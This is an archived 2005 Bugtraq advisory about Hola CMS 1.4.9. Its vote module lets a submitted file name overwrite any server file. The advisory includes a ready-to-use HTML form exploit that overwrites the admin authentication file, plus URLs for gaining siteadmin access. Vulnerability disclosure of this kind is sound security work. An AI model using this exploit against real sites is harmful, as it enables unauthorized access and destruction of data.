lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050312224555.4397.qmail@www.securityfocus.com>
Date: 12 Mar 2005 22:45:55 -0000
From: Virginity Security <advisory05@...fiweb.de>
To: bugtraq@...urityfocus.com
Subject: Virginity Security Advisory 2005-001 : Hola CMS - File
    destruction and System access





- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
             DATE : 2005-03-12 15:45 GMT
             TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 003
- - - --------------------------------------------------------------------


Description:

I found a serious security hole in Hola CMS:
The Vote-Module doesn't check wether the submitted "vote_filename" variable
is in the holaDB/votes/ directory where it should be.
So anything could be added in there. This can be used to manipluate or destroy system files
- not only the ones in the CMS but every file on the whole server!!!
Below i will show an example how to destroy login-authentification file and gaining access
to admin-functions!

Author of the Software has been notified.

- - - --------------------------------------------------------------------


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!

But thats just for that lame CMS... of course you could attack operating-system files
or do other funny things. NO! Please don't do it! Just test on your own system :P
- - - --------------------------------------------------------------------


Solution:

Author wasn't nice last time so no more help for this piece of vuln software.
But i strongly reccomend you to use some other software since there are
still many other vulns in it!

- - - --------------------------------------------------------------------


Personal note:

So you thought this girl couldn't do it anymore? Here it goes... read and enjoy!
For contact please don't mail me cuz my mailbox is full of spam :(
But if you want to find me on IRC you'll make it!

- - - --------------------------------------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ